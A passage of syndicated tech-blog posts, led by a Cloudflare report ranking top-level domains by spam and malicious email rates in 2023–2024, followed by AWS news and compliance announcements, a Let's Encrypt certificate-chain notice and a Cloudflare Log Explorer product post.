A quick overview highlights the TLDs with the highest rates of spam and malicious attacks as a proportion of their outbound email, those with the largest volume share of spam or malicious emails, and those with the highest rates of just-malicious and just-spam TLD senders. It reveals that newer TLDs, especially those associated with the beauty industry (generally available since 2021 and serving a booming industry), have the highest rates as a proportion of their emails. However, it’s relevant to recognize that “.com” accounts for 67% of all spam and malicious emails. Malicious emails often originate from recently created generic TLDs like “.bar”, “.makeup”, or “.cyou”, as well as certain country-code TLDs (ccTLDs) employed beyond their geographical implications.

Highest % of spam and malicious emails	Volume share of spam + malicious	Highest % of malicious	Highest % of spam
TLD	Spam + mal %	TLD	Spam + mal %	TLD	Malicious %	TLD	Spam %
.uno	99%	.com	67%	.bar	70%	.autos	93%
.sbs	98%	.shop	5%	.makeup	63%	.today	92%
.best	97%	.net	4%	.cyou	62%	.directory	91%
.beauty	97%	.no	3%	.ml	56%	.boats	87%
.top	97%	.org	2%	.tattoo	54%	.center	85%
.hair	97%	.ru	1%	.om	47%	.monster	80%
.monster	96%	.jp	1%	.cfd	46%	.lol	79%
.cyou	96%	.click	1%	.skin	39%	.hair	78%
.wiki	95%	.beauty	1%	.uno	37%	.shop	78%
.makeup	95%	.cn	1%	.pw	37%	.beauty	77%

Focusing on volume share, “.com” dominates the spam + malicious list at 67%, and is joined in the top 3 by another “classic” gTLD, “.net”, at 4%. They also lead by volume when we look separately at the malicious (68% of all malicious emails are “.com” and “.net”) and spam (71%) categories, as shown below. All of the generic TLDs introduced since 2014 represent 13.4% of spam and malicious and over 14% of only malicious emails. These new TLDs (most of them are only available since 2016) are notable sources of both spam and malicious messages. Meanwhile, country-code TLDs contribute to more than 12% of both categories of unwanted emails.

This breakdown highlights the critical role of both established and new generic TLDs, which surpass older ccTLDs in terms of malicious emails, pointing to the changing dynamics of email-based threats.

Type of TLDs	Spam	Malicious	Spam + malicious
ccTLDs	13%	12%	12%
.com and .net only	71%	68%	71%
new gTLDs	13%	14%	13.4%

That said, “.shop” deserves a highlight of its own. The TLD, which has been available since 2016, is #2 by volume of spam and malicious emails, accounting for 5% of all of those emails. It also represents, when we separate those two categories, 5% of all malicious emails, and 5% of all spam emails. As we’re going to see below, its influence is growing.

Full 2023 top 50 spam & malicious TLDs list

For a more detailed perspective, below we present the top 50 TLDs with the highest percentages of spam and malicious emails during 2023. We also include a breakdown of those two categories.

It’s noticeable that even outside the top 10, other recent generic TLDs are also higher in the ranking, such as “.autos” (the #1 in the spam list), “.today”, “.bid” or “.cam”. TLDs that seem to promise entertainment or fun or are just leisure or recreational related (including “.fun” itself), occupy a position in our top 50 ranking.

2023 Top 50 spam & malicious TLDs (by highest %)
Rank	TLD	Spam %	Malicious %	Spam + malicious %
1	.uno	62%	37%	99%
2	.sbs	64%	35%	98%
3	.best	68%	29%	97%
4	.beauty	77%	20%	97%
5	.top	74%	23%	97%
6	.hair	78%	18%	97%
7	.monster	80%	17%	96%
8	.cyou	34%	62%	96%
9	.wiki	69%	26%	95%
10	.makeup	32%	63%	95%
11	.autos	93%	2%	95%
12	.today	92%	3%	94%
13	.shop	78%	16%	94%
14	.bid	74%	18%	92%
15	.cam	67%	25%	92%
16	.directory	91%	0%	91%
17	.icu	75%	15%	91%
18	.ml	33%	56%	89%
19	.lol	79%	10%	89%
20	.skin	49%	39%	88%
21	.boats	87%	1%	88%
22	.tattoo	34%	54%	87%
23	.click	61%	27%	87%
24	.ltd	70%	17%	86%
25	.rest	74%	11%	86%
26	.center	85%	0%	85%
27	.fun	64%	21%	85%
28	.cfd	39%	46%	84%
29	.bar	14%	70%	84%
30	.bio	72%	11%	84%
31	.tk	66%	17%	83%
32	.yachts	58%	23%	81%
33	.one	63%	17%	80%
34	.ink	68%	10%	78%
35	.wf	76%	1%	77%
36	.no	76%	0%	76%
37	.pw	39%	37%	75%
38	.site	42%	31%	73%
39	.life	56%	16%	72%
40	.homes	62%	10%	72%
41	.services	67%	2%	69%
42	.mom	63%	5%	68%
43	.ir	37%	29%	65%
44	.world	43%	21%	65%
45	.lat	40%	24%	64%
46	.xyz	46%	18%	63%
47	.ee	62%	1%	62%
48	.live	36%	26%	62%
49	.pics	44%	16%	60%
50	.mobi	41%	19%	60%

Change in spam & malicious TLD patterns

Let’s look at TLDs where spam + malicious emails comprised the largest share of total messages from that TLD, and how that list of TLDs changed from the first half of 2023 to the second half. This shows which TLDs were most problematic at different times during the year.

Highlighted in bold in the following table are those TLDs that climbed in the rankings for the percentage of spam and malicious emails from July to December 2023, compared with January to June. Generic TLDs “.uno”, “.makeup” and “.directory” appeared in the top list and in higher positions for the first time in the last six months of the year.

January – June 2023	July – Dec 2023
tld	Spam + malicious %	tld	Spam + malicious %
.click	99%	.uno	99%
.best	99%	.sbs	98%
.yachts	99%	.beauty	97%
.hair	99%	.best	97%
.autos	99%	.makeup	95%
.wiki	98%	.monster	95%
.today	98%	.directory	95%
.mom	98%	.bid	95%
.sbs	97%	.top	93%
.top	97%	.shop	92%
.monster	97%	.today	92%
.beauty	97%	.cam	92%
.bar	96%	.cyou	92%
.rest	95%	.icu	91%
.cam	95%	.boats	88%
.homes	94%	.wiki	88%
.pics	94%	.rest	88%
.lol	94%	.hair	87%
.quest	93%	.fun	87%
.cyou	93%	.cfd	86%
.ink	92%	.skin	85%
.shop	92%	.ltd	84%
.skin	91%	.one	83%
.ltd	91%	.center	83%
.tattoo	91%	.services	81%
.no	90%	.lol	78%
.ml	90%	.wf	78%
.center	90%	.pw	76%
.store	90%	.life	76%
.icu	89%	.click	75%

From the rankings, it’s clear that the recent generic TLDs have the highest spam and malicious percentage of all emails. The top 10 TLDs in both halves of 2023 are all recent and generic, with several introduced since 2021.

Reasons for the prominence of these gTLDs include the availability of domain names that can seem legitimate or mimic well-known brands, as we explain in this blog post. Cybercriminals often use popular or catchy words. Some gTLDs allow anonymous registration. Their low cost and the delay in updated security systems to recognize new gTLDs as spam and malicious sources also play a role — note that, as we’ve seen, cyber criminals also like to change TLDs and methods.

The impact of a lawsuit?

There’s also been a change in the types of domains with the highest malicious percentage in 2023, possibly due to Meta’s lawsuit against Freenom, filed in December 2022 and refiled in March 2023. Freenom provided domain name registry services for free in five ccTLDs, which wound up being used for purposes beyond local businesses or content: “.cf” (Central African Republic), “.ga” (Gabon), “.gq” (Equatorial Guinea), “.ml” (Mali), and “.tk” (Tokelau). However, Freenom stopped new registrations during 2023 following the lawsuit, and in February 2024, announced its decision to exit the domain name business.

Focusing on Freenom TLDs, which appeared in our top 50 ranking only in the first half of 2023, we see a clear shift. Since October, these TLDs have become less relevant in terms of all emails, including malicious and spam percentages. In February 2023, they accounted for 0.17% of all malicious emails we tracked, and 0.04% of all spam and malicious. Their presence has decreased since then, becoming almost non-existent in email volume in September and October, similar to other analyses.

TLDs ordered by volume of spam + malicious

In addition to looking at their share, another way to examine the data is to identify the TLDs that have a higher volume of spam and malicious emails — the next table is ordered that way. This means that we are able to show more familiar (and much older) TLDs, such as “.com”. We’ve included here the percentage of all emails in any given TLD that are classified as spam or malicious, and also spam + malicious to spotlight those that may require more caution. For instance, with high volume “.shop”, “.no”, “.click”, “.beauty”, “.top”, “.monster”, “.autos”, and “.today” stand out with a higher spam and malicious percentage (and also only malicious email percentage).

In the realm of country-code TLDs, Norway’s “.no” leads in spam, followed by China’s “.cn”, Russia’s “.ru”, Ukraine’s “.ua”, and Anguilla’s “.ai”, which recently has been used more for artificial intelligence-related domains than for the country itself.

In bold and red, we’ve highlighted the TLDs where spam + malicious represents more than 20% of all emails in that TLD — already what we consider a high number for domains with a lot of emails.

TLDs with more spam + malicious emails (in volume) in 2023
Rank	TLD	Spam %	Malicious %	Spam + mal %
1	.com	3.6%	0.8%	4.4%
2	.shop	77.8%	16.4%	94.2%
3	.net	2.8%	1.0%	3.9%
4	.no	76.0%	0.3%	76.3%
5	.org	3.3%	1.8%	5.2%
6	.ru	15.2%	7.7%	22.9%
7	.jp	3.4%	2.5%	5.9%
8	.click	60.6%	26.6%	87.2%
9	.beauty	77.0%	19.9%	96.9%
10	.cn	25.9%	3.3%	29.2%
11	.top	73.9%	22.8%	96.6%
12	.monster	79.7%	16.8%	96.5%
13	.de	13.0%	2.1%	15.2%
14	.best	68.1%	29.4%	97.4%
15	.gov	0.6%	2.0%	2.6%
16	.autos	92.6%	2.0%	94.6%
17	.ca	5.2%	0.5%	5.7%
18	.uk	3.2%	0.8%	3.9%
19	.today	91.7%	2.6%	94.3%
20	.io	3.6%	0.5%	4.0%
21	.us	5.7%	1.9%	7.6%
22	.co	6.3%	0.8%	7.1%
23	.biz	27.2%	14.0%	41.2%
24	.edu	0.9%	0.2%	1.1%
25	.info	20.4%	5.4%	25.8%
26	.ai	28.3%	0.1%	28.4%
27	.sbs	63.8%	34.5%	98.3%
28	.it	2.5%	0.3%	2.8%
29	.ua	37.4%	0.6%	38.0%
30	.fr	8.5%	1.0%	9.5%

The curious case of “.gov” email spoofing

When we concentrate our research on message volume to identify TLDs with more malicious emails blocked by our Cloud Email Security service, we discover a trend related to “.gov”.

TLDs ordered by malicious email volume	% of all malicious emails
.com	63%
.net	5%
.shop	5%
.org	3%
.gov	2%
.ru	2%
.jp	2%
.click	1%
.best	0.9%
.beauty	0.8%

The first three domains, “.com” (63%), “.net” (5%), and “.shop” (5%), were previously seen in our rankings and are not surprising. However, in fourth place is “.org”, known for being used by non-profit and other similar organizations, but it has an open registration policy. In fifth place is “.gov”, used only by the US government and administered by CISA. Our investigation suggests that it appears in the ranking because of typical attacks where cybercriminals pretend to be a legitimate address (email spoofing, creation of email messages with a forged sender address). In this case, they use “.gov” when launching attacks.

The spoofing behavior linked to “.gov” is similar to that of other TLDs. It includes fake senders failing SPF validation and other DNS-based authentication methods, along with various other types of attacks. An email failing SPF, DKIM, and DMARC checks typically indicates that a malicious sender is using an unauthorized IP, domain, or both. So, there are more straightforward ways to block spoofed emails without examining their content for malicious elements.

Ranking TLDs by proportions of malicious and spam email in 2023

In this section, we have included two lists: one ranks TLDs by the highest percentage of malicious emails — those you should exercise greater caution with; the second ranks TLDs by just their spam percentage. These contrast with the previous top 50 list ordered by combined spam and malicious percentages. In the case of malicious emails, the top 3 with the highest percentage are all generic TLDs. The #1 was “.bar”, with 70% of all emails being categorized as malicious, followed by “.makeup”, and “.cyou” — marketed as the phrase “see you”.

The malicious list also includes some country-code TLDs (ccTLDs) not primarily used for country-related topics, like .ml (Mali), .om (Oman), and .pw (Palau). The list also includes other ccTLDs such as .ir (Iran) and .kg (Kyrgyzstan), .lk (Sri Lanka).

In the spam realm, it’s “autos”, with 93%, and other generic TLDs such as “.today”, and “.directory” that take the first three spots, also seeing shares over 90%.

2023 ordered by malicious email %	2023 ordered by spam email %
tld	Malicious %	tld	Spam %
.bar	70%	.autos	93%
.makeup	63%	.today	92%
.cyou	62%	.directory	91%
.ml	56%	.boats	87%
.tattoo	54%	.center	85%
.om	47%	.monster	80%
.cfd	46%	.lol	79%
.skin	39%	.hair	78%
.uno	37%	.shop	78%
.pw	37%	.beauty	77%
.sbs	35%	.no	76%
.site	31%	.wf	76%
.store	31%	.icu	75%
.best	29%	.bid	74%
.ir	29%	.rest	74%
.lk	27%	.top	74%
.work	27%	.bio	72%
.click	27%	.ltd	70%
.wiki	26%	.wiki	69%
.live	26%	.best	68%
.cam	25%	.ink	68%
.lat	24%	.cam	67%
.yachts	23%	.services	67%
.top	23%	.tk	66%
.world	21%	.sbs	64%
.fun	21%	.fun	64%
.beauty	20%	.one	63%
.mobi	19%	.mom	63%
.kg	19%	.uno	62%
.hair	18%	.homes	62%

How it stands in 2024: new higher-risk TLDs

2024 has seen new players enter the high-risk zone for unwanted emails. In this list we have only included the new TLDs that weren’t in the top 50 during 2023, and joined the list in January. New entrants include Samoa’s “.ws”, Indonesia’s “.id” (also used because of its “identification” meaning), and the Cocos Islands’ “.cc”. These ccTLDs, often used for more than just country-related purposes, have shown high percentages of malicious emails, ranging from 20% (.cc) to 95% (.ws) of all emails.

January 2024: Newer TLDs in the top 50 list
TLD	Spam %	Malicious %	Spam + mal %
.ws	3%	95%	98%
.company	96%	0%	96%
.digital	72%	2%	74%
.pro	66%	6%	73%
.tz	62%	4%	65%
.id	13%	39%	51%
.cc	25%	21%	46%
.space	32%	8%	40%
.enterprises	2%	37%	40%
.lv	30%	1%	30%
.cn	26%	3%	29%
.jo	27%	1%	28%
.info	21%	5%	26%
.su	20%	5%	25%
.ua	23%	1%	24%
.museum	0%	24%	24%
.biz	16%	7%	24%
.se	23%	0%	23%
.ai	21%	0%	21%

Overview of email threat trends since 2023

With Cloudflare’s Cloud Email Security, we gain insight into the broader email landscape over the past months. The spam percentage of all emails stood at 8.58% in 2023. As mentioned before, keep in mind with these percentages that our protection typically kicks in after other email providers’ filters have already removed some spam and malicious emails.

How about malicious emails? Almost 3% of all emails were flagged as malicious during 2023, with the highest percentages occurring in Q4. Here’s the “malicious” evolution, where we’re also including the January and February 2024 perspective:

The week before Christmas and the first week of 2024 experienced a significant spike in malicious emails, reaching an average of 7% and 8% across the weeks, respectively. Not surprisingly, there was a noticeable decrease during Christmas week, when it dropped to 3%. Other significant increases in the percentage of malicious emails were observed the week before Valentine’s Day, the first week of September (coinciding with returns to work and school in the Northern Hemisphere), and late October.

Threat categories in 2023

We can also look to different types of threats in 2023. Links were present in 49% of all threats. Other categories included extortion (36%), identity deception (27%), credential harvesting (23%), and brand impersonation (18%). These categories are defined and explored in detail in Cloudflare’s 2023 phishing threats report. Extortion saw the most growth in Q4, especially in November and December reaching 38% from 7% of all threats in Q1 2023.

Other trends: Attachments are still popular

Other less “threatening” trends show that 20% of all emails included attachments (as the next chart shows), while 82% contained links in the body. Additionally, 31% were composed in plain text, and 18% featured HTML, which allows for enhanced formatting and visuals. 39% of all emails used remote content.

Conclusion: Be cautious, prepared, safe

The landscape of spam and malicious (or phishing) emails constantly evolves alongside technology, the Internet, user behaviors, use cases, and cybercriminals. As we’ve seen through Cloudflare’s Cloud Email Security insights, new generic TLDs have emerged as preferred channels for these malicious activities, highlighting the need for vigilance when dealing with emails from unfamiliar domains.

There’s no shortage of advice on staying safe from phishing. Email remains a ubiquitous yet highly exploited tool in daily business operations. Cybercriminals often bait users into clicking malicious links within emails, a tactic used by both sophisticated criminal organizations and novice attackers. So, always exercise caution online.

Cloudflare’s Cloud Email Security provides insights that underscore the importance of robust cybersecurity infrastructure in fighting the dynamic tactics of phishing attacks.

If you want to learn more about email security, you can check Cloudflare Radar’s new email section, visit our Learning Center or reach out for a complimentary phishing risk assessment for your organization.

(Contributors to this blog post include Jeremy Eckman, Phil Syme, and Oren Falkowitz.)

AWS Weekly Roundup — Claude 3 Haiku in Amazon Bedrock, AWS CloudFormation optimizations, and more — March 18, 2024

2024-03-18 Antje Barth

Post Syndicated from Antje Barth original https://aws.amazon.com/blogs/aws/aws-weekly-roundup-claude-3-haiku-in-amazon-bedrock-aws-cloudformation-optimizations-and-more-march-18-2024/

Storage, storage, storage! Last week, we celebrated 18 years of innovation on Amazon Simple Storage Service (Amazon S3) at AWS Pi Day 2024. Amazon S3 mascot Buckets joined the celebrations and had a ton of fun! The 4-hour live stream was packed with puns, pie recipes powered by PartyRock, demos, code, and discussions about generative AI and Amazon S3.

AWS Pi Day 2024 — Twitch live stream on March 14, 2024

In case you missed the live stream, you can watch the recording. We’ll also update the AWS Pi Day 2024 post on community.aws this week with show notes and session clips.

Last week’s launches
Here are some launches that got my attention:

Anthropic’s Claude 3 Haiku model is now available in Amazon Bedrock — Anthropic recently introduced the Claude 3 family of foundation models (FMs), comprising Claude 3 Haiku, Claude 3 Sonnet, and Claude 3 Opus. Claude 3 Haiku, the fastest and most compact model in the family, is now available in Amazon Bedrock. Check out Channy’s post for more details. In addition, my colleague Mike shows how to get started with Haiku in Amazon Bedrock in his video on community.aws.

Up to 40 percent faster stack creation with AWS CloudFormation — AWS CloudFormation now creates stacks up to 40 percent faster and has a new event called CONFIGURATION_COMPLETE. With this event, CloudFormation begins parallel creation of dependent resources within a stack, speeding up the whole process. The new event also gives users more control to shortcut their stack creation process in scenarios where a resource consistency check is unnecessary. To learn more, read this AWS DevOps Blog post.

Amazon SageMaker Canvas extends its model registry integration — SageMaker Canvas has extended its model registry integration to include time series forecasting models and models fine-tuned through SageMaker JumpStart. Users can now register these models to the SageMaker Model Registry with just a click. This enhancement expands the model registry integration to all problem types supported in Canvas, such as regression/classification tabular models and CV/NLP models. It streamlines the deployment of machine learning (ML) models to production environments. Check the Developer Guide for more information.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news
Here are some additional news items, open source projects, and Twitch shows that you might find interesting:

Build On Generative AI — Season 3 of your favorite weekly Twitch show about all things generative AI is in full swing! Streaming every Monday, 9:00 US PT, my colleagues Tiffany and Darko discuss different aspects of generative AI and invite guest speakers to demo their work. In today’s episode, guest Martyn Kilbryde showed how to build a JIRA Agent powered by Amazon Bedrock. Check out show notes and the full list of episodes on community.aws.

Amazon S3 Connector for PyTorch — The Amazon S3 Connector for PyTorch now lets PyTorch Lightning users save model checkpoints directly to Amazon S3. Saving PyTorch Lightning model checkpoints is up to 40 percent faster with the Amazon S3 Connector for PyTorch than writing to Amazon Elastic Compute Cloud (Amazon EC2) instance storage. You can now also save, load, and delete checkpoints directly from PyTorch Lightning training jobs to Amazon S3. Check out the open source project on GitHub.

AWS open source news and updates — My colleague Ricardo writes this weekly open source newsletter in which he highlights new open source projects, tools, and demos from the AWS Community.

Upcoming AWS events
Check your calendars and sign up for these AWS events:

AWS at NVIDIA GTC 2024 — The NVIDIA GTC 2024 developer conference is taking place this week (March 18–21) in San Jose, CA. If you’re around, visit AWS at booth #708 to explore generative AI demos and get inspired by AWS, AWS Partners, and customer experts on the latest offerings in generative AI, robotics, and advanced computing at the in-booth theatre. Check out the AWS sessions and request 1:1 meetings.

AWS Summits — It’s AWS Summit season again! The first one is Paris (April 3), followed by Amsterdam (April 9), Sydney (April 10–11), London (April 24), Berlin (May 15–16), and Seoul (May 16–17). AWS Summits are a series of free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS.

AWS re:Inforce — Join us for AWS re:Inforce (June 10–12) in Philadelphia, PA. AWS re:Inforce is a learning conference focused on AWS security solutions, cloud security, compliance, and identity. Connect with the AWS teams that build the security tools and meet AWS customers to learn about their security journeys.

You can browse all upcoming in-person and virtual events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

— Antje

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

Upcoming Let’s Encrypt certificate chain change and impact for Cloudflare customers

2024-03-14 Dina Kozlov

Post Syndicated from Dina Kozlov original https://blog.cloudflare.com/upcoming-lets-encrypt-certificate-chain-change-and-impact-for-cloudflare-customers

Let’s Encrypt, a publicly trusted certificate authority (CA) that Cloudflare uses to issue TLS certificates, has been relying on two distinct certificate chains. One is cross-signed with IdenTrust, a globally trusted CA that has been around since 2000, and the other is Let’s Encrypt’s own root CA, ISRG Root X1. Since Let’s Encrypt launched, ISRG Root X1 has been steadily gaining its own device compatibility.

On September 30, 2024, Let’s Encrypt’s certificate chain cross-signed with IdenTrust will expire. To proactively prepare for this change, on May 15, 2024, Cloudflare will stop issuing certificates from the cross-signed chain and will instead use Let’s Encrypt’s ISRG Root X1 chain for all future Let’s Encrypt certificates.

The change in the certificate chain will impact legacy devices and systems, such as Android devices version 7.1.1 or older, as those exclusively rely on the cross-signed chain and lack the ISRG X1 root in their trust store. These clients may encounter TLS errors or warnings when accessing domains secured by a Let’s Encrypt certificate.

According to Let’s Encrypt, more than 93.9% of Android devices already trust the ISRG Root X1 and this number is expected to increase in 2024, especially as Android releases version 14, which makes the Android trust store easily and automatically upgradable.

We took a look at the data ourselves and found that, from all Android requests, 2.96% of them come from devices that will be affected by the change. In addition, only 1.13% of all requests from Firefox come from affected versions, which means that most (98.87%) of the requests coming from Android versions that are using Firefox will not be impacted.

Preparing for the change

If you’re worried about the change impacting your clients, there are a few things that you can do to reduce the impact of the change. If you control the clients that are connecting to your application, we recommend updating the trust store to include the ISRG Root X1. If you use certificate pinning, remove or update your pin. In general, we discourage all customers from pinning their certificates, as this usually leads to issues during certificate renewals or CA changes.

If you experience issues with the Let’s Encrypt chain change, and you’re using Advanced Certificate Manager or SSL for SaaS on the Enterprise plan, you can choose to switch your certificate to use Google Trust Services as the certificate authority instead.

For more information, please refer to our developer documentation.

While this change will impact a very small portion of clients, we support the shift that Let’s Encrypt is making as it supports a more secure and agile Internet.

Embracing change to move towards a better Internet

Looking back, there were a number of challenges that slowed down the adoption of new technologies and standards that helped make the Internet faster, more secure, and more reliable.

For starters, before Cloudflare launched Universal SSL, free certificates were not attainable. Instead, domain owners had to pay around $100 to get a TLS certificate. For a small business, this is a big cost and without browsers enforcing TLS, this significantly hindered TLS adoption for years. Insecure algorithms have taken decades to deprecate due to lack of support of new algorithms in browsers or devices. We learned this lesson while deprecating SHA-1.

Supporting new security standards and protocols is vital for us to continue improving the Internet. Over the years, big and sometimes risky changes were made in order for us to move forward. The launch of Let’s Encrypt in 2015 was monumental. Let’s Encrypt allowed every domain to get a TLS certificate for free, which paved the way to a more secure Internet, with now around 98% of traffic using HTTPS.

In 2014, Cloudflare launched elliptic curve digital signature algorithm (ECDSA) support for Cloudflare-issued certificates and made the decision to issue ECDSA-only certificates to free customers. This boosted ECDSA adoption by pressing clients and web operators to make changes to support the new algorithm, which provided the same (if not better) security as RSA while also improving performance. In addition to that, modern browsers and operating systems are now being built in a way that allows them to constantly support new standards, so that they can deprecate old ones.

For us to move forward in supporting new standards and protocols, we need to make the Public Key Infrastructure (PKI) ecosystem more agile. By retiring the cross-signed chain, Let’s Encrypt is pushing devices, browsers, and clients to support adaptable trust stores. This allows clients to support new standards without causing a breaking change. It also lays the groundwork for new certificate authorities to emerge.

Today, one of the main reasons why there’s a limited number of CAs available is that it takes years for them to become widely trusted, that is, without cross-signing with another CA. In 2017, Google launched a new publicly trusted CA, Google Trust Services, that issued free TLS certificates. Even though they launched a few years after Let’s Encrypt, they faced the same challenges with device compatibility and adoption, which caused them to cross-sign with GlobalSign’s CA. We hope that, by the time GlobalSign’s CA comes up for expiration, almost all traffic is coming from a modern client and browser, meaning the change impact should be minimal.

AWS completes the annual Dubai Electronic Security Centre certification audit to operate as a Tier 1 cloud service provider in the Emirate of Dubai

2024-03-12 Vishal Pabari

Post Syndicated from Vishal Pabari original https://aws.amazon.com/blogs/security/aws-completes-the-annual-dubai-electronic-security-centre-certification-audit-to-operate-as-a-tier-1-cloud-service-provider-in-the-emirate-of-dubai/

We’re excited to announce that Amazon Web Services (AWS) has completed the annual Dubai Electronic Security Centre (DESC) certification audit to operate as a Tier 1 cloud service provider (CSP) for the AWS Middle East (UAE) Region.

This alignment with DESC requirements demonstrates our continuous commitment to adhere to the heightened expectations for CSPs. Government customers of AWS can run their applications in AWS Cloud-certified Regions with confidence.

The independent third-party auditor BSI evaluated AWS on behalf of DESC on January 23, 2024. The Certificate of Compliance that illustrates the compliance status of AWS is available through AWS Artifact. AWS Artifact is a self-service portal for on-demand access to AWS compliance reports. Sign in to AWS Artifact in the AWS Management Console, or learn more at Getting Started with AWS Artifact.

The certification includes 25 additional services in scope, for a total of 87 services. This is a 40% increase in the number of services in the Middle East (UAE) Region that are in scope of the DESC CSP certification. For up-to-date information, including when additional services are added, see the AWS Services in Scope by Compliance Program webpage and choose DESC CSP.

AWS strives to continuously bring services into the scope of its compliance programs to help you meet your architectural and regulatory needs. If you have questions or feedback about DESC compliance, reach out to your AWS account team.

To learn more about our compliance and security programs, see AWS Compliance Programs. As always, we value your feedback and questions; reach out to the AWS Compliance team through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.

AWS completes the annual UAE Information Assurance Regulation compliance assessment

2024-03-12 Vishal Pabari

Post Syndicated from Vishal Pabari original https://aws.amazon.com/blogs/security/aws-completes-the-annual-uae-information-assurance-regulation-compliance-assessment/

Amazon Web Services (AWS) is pleased to announce the publication of our annual compliance assessment report on the Information Assurance Regulation (IAR) established by the Telecommunications and Digital Government Regulatory Authority (TDRA) of the United Arab Emirates (UAE). The report covers the AWS Middle East (UAE) Region.

The IAR provides management and technical information security controls to help establish, implement, maintain, and continuously improve information assurance. AWS alignment with IAR requirements demonstrates our ongoing commitment to adhere to the heightened expectations for cloud service providers. As such, IAR-regulated customers can continue to use AWS services with confidence.

Independent third-party auditors from BDO evaluated AWS for the period of November 1, 2022, to October 31, 2023. The assessment report that illustrates the status of AWS compliance is available through AWS Artifact. AWS Artifact is a self-service portal for on-demand access to AWS compliance reports. Sign in to AWS Artifact in the AWS Management Console, or learn more at Getting Started with AWS Artifact.

AWS strives to continuously bring services into the scope of its compliance programs to help you meet your architectural and regulatory needs. If you have questions or feedback about IAR compliance, reach out to your AWS account team.

If you have feedback about this post, submit comments in the Comments section below.

Log Explorer: monitor security events without third-party storage

2024-03-08 Jen Sells

Post Syndicated from Jen Sells original https://blog.cloudflare.com/log-explorer

Today, we are excited to announce beta availability of Log Explorer, which allows you to investigate your HTTP and Security Event logs directly from the Cloudflare Dashboard. Log Explorer is an extension of Security Analytics, giving you the ability to review related raw logs. You can analyze, investigate, and monitor for security attacks natively within the Cloudflare Dashboard, reducing time to resolution and overall cost of ownership by eliminating the need to forward logs to third party security analysis tools.

Background

Security Analytics enables you to analyze all of your HTTP traffic in one place, giving you the security lens you need to identify and act upon what matters most: potentially malicious traffic that has not been mitigated. Security Analytics includes built-in views such as top statistics and in-context quick filters on an intuitive page layout that enables rapid exploration and validation.

In order to power our rich analytics dashboards with fast query performance, we implemented data sampling using Adaptive Bit Rate (ABR) analytics. This is a great fit for providing high level aggregate views of the data. However, we received feedback from many Security Analytics power users that sometimes they need access to a more granular view of the data — they need logs.

Logs provide critical visibility into the operations of today’s computer systems. Engineers and SOC analysts rely on logs every day to troubleshoot issues, identify and investigate security incidents, and tune the performance, reliability, and security of their applications and infrastructure. Traditional metrics or monitoring solutions provide aggregated or statistical data that can be used to identify trends. Metrics are wonderful at identifying THAT an issue happened, but lack the detailed events to help engineers uncover WHY it happened. Engineers and SOC Analysts rely on raw log data to answer questions such as:

What is causing this increase in 403 errors?
What data was accessed by this IP address?
What was the user experience of this particular user’s session?

Traditionally, these engineers and analysts would stand up a collection of various monitoring tools in order to capture logs and get this visibility. With more organizations using multiple clouds, or a hybrid environment with both cloud and on-premise tools and architecture, it is crucial to have a unified platform to regain visibility into this increasingly complex environment. As more and more companies are moving towards a cloud native architecture, we see Cloudflare’s connectivity cloud as an integral part of their performance and security strategy.

Log Explorer provides a lower cost option for storing and exploring log data within Cloudflare. Until today, we have offered the ability to export logs to expensive third party tools, and now with Log Explorer, you can quickly and easily explore your log data without leaving the Cloudflare Dashboard.

Log Explorer Features

Whether you’re a SOC Engineer investigating potential incidents, or a Compliance Officer with specific log retention requirements, Log Explorer has you covered. It stores your Cloudflare logs for an uncapped and customizable period of time, making them accessible natively within the Cloudflare Dashboard. The supported features include:

Searching through your HTTP Request or Security Event logs
Filtering based on any field and a number of standard operators
Switching between basic filter mode or SQL query interface
Selecting fields to display
Viewing log events in tabular format
Finding the HTTP request records associated with a Ray ID

Narrow in on unmitigated traffic

As a SOC analyst, your job is to monitor and respond to threats and incidents within your organization’s network. Using Security Analytics, and now with Log Explorer, you can identify anomalies and conduct a forensic investigation all in one place.

Let’s walk through an example to see this in action:

On the Security Analytics dashboard, you can see in the Insights panel that there is some traffic that has been tagged as a likely attack, but not mitigated.

Clicking the filter button narrows in on these requests for further investigation.

In the sampled logs view, you can see that most of these requests are coming from a common client IP address.

You can also see that Cloudflare has flagged all of these requests as bot traffic. With this information, you can craft a WAF rule to either block all traffic from this IP address, or block all traffic with a bot score lower than 10.

Let’s say that the Compliance Team would like to gather documentation on the scope and impact of this attack. We can dig further into the logs during this time period to see everything that this attacker attempted to access.

First, we can use Log Explorer to query HTTP requests from the suspect IP address during the time range of the spike seen in Security Analytics.

We can also review whether the attacker was able to exfiltrate data by adding the OriginResponseBytes field and updating the query to show requests with OriginResponseBytes > 0. The results show that no data was exfiltrated.

Find and investigate false positives

With access to the full logs via Log Explorer, you can now perform a search to find specific requests.

A 403 error occurs when a user’s request to a particular site is blocked. Cloudflare’s security products use things like IP reputation and WAF attack scores based on ML technologies in order to assess whether a given HTTP request is malicious. This is extremely effective, but sometimes requests are mistakenly flagged as malicious and blocked.

In these situations, we can now use Log Explorer to identify these requests and why they were blocked, and then adjust the relevant WAF rules accordingly.

Or, if you are interested in tracking down a specific request by Ray ID, an identifier given to every request that goes through Cloudflare, you can do that via Log Explorer with one query.

Note that the LIMIT clause is included in the query by default, but has no impact on RayID queries as RayID is unique and only one record would be returned when using the RayID filter field.

How we built Log Explorer

With Log Explorer, we have built a long-term, append-only log storage platform on top of Cloudflare R2. Log Explorer leverages the Delta Lake protocol, an open-source storage framework for building highly performant, ACID-compliant databases atop a cloud object store. In other words, Log Explorer combines a large and cost-effective storage system – Cloudflare R2 – with the benefits of strong consistency and high performance. Additionally, Log Explorer gives you a SQL interface to your Cloudflare logs.

Each Log Explorer dataset is stored on a per-customer level, just like Cloudflare D1, so that your data isn’t placed with that of other customers. In the future, this single-tenant storage model will give you the flexibility to create your own retention policies and decide in which regions you want to store your data.

Under the hood, the datasets for each customer are stored as Delta tables in R2 buckets. A Delta table is a storage format that organizes Apache Parquet objects into directories using Hive’s partitioning naming convention. Crucially, Delta tables pair these storage objects with an append-only, checkpointed transaction log. This design allows Log Explorer to support multiple writers with optimistic concurrency.

